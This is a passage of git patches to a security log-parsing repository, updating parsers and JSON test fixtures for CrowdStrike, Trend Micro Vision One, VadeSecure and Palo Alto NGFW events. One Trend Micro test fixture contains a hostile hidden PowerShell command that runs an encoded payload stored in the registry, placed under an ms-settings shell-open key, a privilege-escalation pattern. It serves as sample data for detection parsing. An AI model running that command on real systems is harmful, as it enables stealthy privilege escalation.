1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 10:51:50 +0200 Subject: [PATCH 063/150] Smart descs --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index 7a3ee9d51..742eee7cc 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -1,4 +1,8 @@ [ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, { "value": "{event.reason}", "conditions": [{ "field": "event.reason" }] From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 12:24:27 +0200 Subject: [PATCH 064/150] Fixes and improvements --- .../trend-micro-vision-one/ingest/parser.yml | 22 +++++++++++-------- .../tests/test_registry.json | 3 ++- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index be400399d..a13ee54b2 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -39,14 +39,19 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + - set: registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" - registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} @@ -57,22 +62,21 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - # @todo should be along with registry.data.type to REG_SZ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index f9873edf1..3c32834ae 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -41,7 +41,8 @@ }, "registry": { "data": { - "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" }, "hive": "hkcr", "key": "ms-settings\\shell\\open\\command", From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 15:51:21 +0200 Subject: [PATCH 065/150] Add test --- .../tests/test_internal_network_scanner.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..e6bcf0088 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "john\\doe", + "name": "john\\doe" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "name": "doe" + } + } +} \ No newline at end of file From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Wed, 20 Nov 2024 16:13:59 +0100 Subject: [PATCH 066/150] Update VadeSecure/vade_secure_m365/_meta/fields.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index a3f60b15c..3dae6aab9 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,10 +58,20 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details: - description: Details of security protocols, mostly SPF, DKIM and DMARC. - name: vadesecure.auth_results_details - type: object +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 20 Nov 2024 16:17:44 +0100 Subject: [PATCH 067/150] fix on linting --- VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 3dae6aab9..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,21 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details.spf: - description: The result of the Sender Policy Framework (SPF) - name: vadesecure.auth_results_details.spf - type: keyword - vadesecure.auth_results_details.dkim: description: The result of the DomainKeys Identified Mail (DKIM) name: vadesecure.auth_results_details.dkim type: keyword vadesecure.auth_results_details.dmarc: - description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) name: vadesecure.auth_results_details.dmarc type: keyword +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:00 +0100 Subject: [PATCH 068/150] chore(PaloAlto): name some columns --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c81ad890e 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:44 +0100 Subject: [PATCH 069/150] fix(PaloAlto): fix the definition of the user properties --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/network_threat_alert_2.json | 6 +++--- .../paloalto-ngfw/tests/test_file_alert_json.json | 6 +++--- Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c81ad890e..b7ec21cac 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -810,8 +810,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:09:32 +0100 Subject: [PATCH 070/150] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..952e819e2 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + 